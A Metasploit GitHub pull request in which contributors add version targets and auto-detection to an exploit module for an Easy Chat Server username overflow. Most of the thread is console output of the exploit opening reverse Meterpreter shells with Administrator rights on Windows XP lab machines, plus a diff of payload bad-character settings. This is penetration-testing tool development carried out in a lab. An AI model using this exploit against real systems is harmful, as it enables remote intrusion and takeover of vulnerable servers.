Update efs_easychatserver_username.rb #3431

bcoles · 2014-06-07T20:43:35Z

Add targets for versions 2.0 to 3.1.
Add install path detection for junk size calculation.
Add version detection for auto targeting.

msf exploit(efs_easychatserver_username) > set VERBOSE true
VERBOSE => true
msf exploit(efs_easychatserver_username) > check

[*] 172.1.1.112:80 - Found version: 2.1
[*] 172.1.1.112:80 - Found path: C:\EFS Software\Easy Chat Server2.1
[*] 172.1.1.112:80 - The target appears to be vulnerable.
msf exploit(efs_easychatserver_username) > run

[*] Started reverse handler on 172.1.1.104:4444 
[*] 172.1.1.112:80 - Found version: 2.1
[*] 172.1.1.112:80 - Using path: C:\EFS Software\Easy Chat Server2.1\users\
[*] 172.1.1.112:80 - Sending request (542 bytes) to target (Easy Chat Server 2.1 - 3.1)
[*] Sending stage (770048 bytes) to 172.1.1.112
[*] Meterpreter session 1 opened (172.1.1.104:4444 -> 172.1.1.112:49242) at 2014-06-07 15:45:35 -0400

meterpreter >

Add targets for versions 2.0 to 3.1. Add install path detection for junk size calculation. Add version detection for auto targeting.

jvazquez-r7 · 2014-06-09T16:50:51Z

Thanks @bcoles , processing!

jvazquez-r7 · 2014-06-09T17:16:46Z

Works on 3.0 and 2.2. But I cannot find a 2.0 version

3.0

msf exploit(efs_easychatserver_username) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.174:80 - Found version: 3.0
[*] 172.16.158.174:80 - Using path: C:\EFS Software\Easy Chat Server\users\
[*] 172.16.158.174:80 - Sending request (545 bytes) to target (Easy Chat Server 2.1 - 3.1)
[*] Sending stage (770048 bytes) to 172.16.158.174
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.174:1073) at 2014-06-09 12:06:29 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.174 - Meterpreter session 4 closed.  Reason: User exit

2.2

msf exploit(efs_easychatserver_username) > check

[*] 172.16.158.174:80 - Found version: 2.2
[*] 172.16.158.174:80 - Found path: C:\Program Files\Easy Chat Server
[*] 172.16.158.174:80 - The target appears to be vulnerable.
msf exploit(efs_easychatserver_username) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.174:80 - Found version: 2.2
[*] 172.16.158.174:80 - Using path: C:\Program Files\Easy Chat Server\users\
[*] 172.16.158.174:80 - Sending request (544 bytes) to target (Easy Chat Server 2.1 - 3.1)
[*] Sending stage (770048 bytes) to 172.16.158.174
[*] Meterpreter session 5 opened (172.16.158.1:4444 -> 172.16.158.174:1074) at 2014-06-09 12:07:48 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.174 - Meterpreter session 5 closed.  Reason: User exit

jvazquez-r7 · 2014-06-09T17:17:50Z

modules/exploits/windows/http/efs_easychatserver_username.rb

      'Payload'        =>
        {
-          'Space'    => 500,
-          'BadChars' => "\x00\x0a\x0b\x0d\x20\x23\x25\x26\x2b\x2f\x3a\x3f\x5c",


I'm worried about the Space and BadChars changes, are they compatible with the 2.0 target, I couldn't download a 2.0 version. Were you able to test?

bcoles · 2014-06-10T04:52:58Z

Thanks @jvazquez-r7

The space and bad characters are valid for 3.1 but I'll have to check 2.0

The exploit works for me reliably on 2.0 to 3.1 with meterpreter bind and reverse.

Here's the links:

jvazquez-r7 · 2014-06-10T14:39:14Z

Thanks @bcoles! giving a chance to 2.0 so!

jvazquez-r7 · 2014-06-10T14:43:49Z

Works also on 2.0:

msf exploit(efs_easychatserver_username) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.174:80 - Sending request (544 bytes) to target (Easy Chat Server 2.0)
[*] Sending stage (770048 bytes) to 172.16.158.174
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.174:1122) at 2014-06-10 09:42:54 -0500
i
dmeterpreter > id
[-] Unknown command: id.
meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter >

Checking the badchars and space params on 2.0 !

jvazquez-r7 · 2014-06-10T14:51:49Z

Yeah, the modified badchars list by @bcoles is accurate also on 2.0, landing!

Update efs_easychatserver_username.rb

6bef6ed

Add targets for versions 2.0 to 3.1. Add install path detection for junk size calculation. Add version detection for auto targeting.

jvazquez-r7 reviewed Jun 9, 2014
View reviewed changes

todb-r7 added the module label Jun 10, 2014

jvazquez-r7 merged commit 6bef6ed into rapid7:master Jun 10, 2014

jvazquez-r7 added a commit that referenced this pull request Jun 10, 2014

Land #3431, @bcoles's new targets for efs_easychatserver_username

3ec15b6

jvazquez-r7 self-assigned this Jun 10, 2014

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Update efs_easychatserver_username.rb #3431

Update efs_easychatserver_username.rb #3431

bcoles commented Jun 7, 2014

jvazquez-r7 commented Jun 9, 2014

jvazquez-r7 commented Jun 9, 2014

jvazquez-r7 Jun 9, 2014

bcoles commented Jun 10, 2014

jvazquez-r7 commented Jun 10, 2014

jvazquez-r7 commented Jun 10, 2014

jvazquez-r7 commented Jun 10, 2014

Update efs_easychatserver_username.rb #3431

Update efs_easychatserver_username.rb #3431

Conversation

bcoles commented Jun 7, 2014

jvazquez-r7 commented Jun 9, 2014

jvazquez-r7 commented Jun 9, 2014

jvazquez-r7 Jun 9, 2014

Choose a reason for hiding this comment

bcoles commented Jun 10, 2014

jvazquez-r7 commented Jun 10, 2014

jvazquez-r7 commented Jun 10, 2014

jvazquez-r7 commented Jun 10, 2014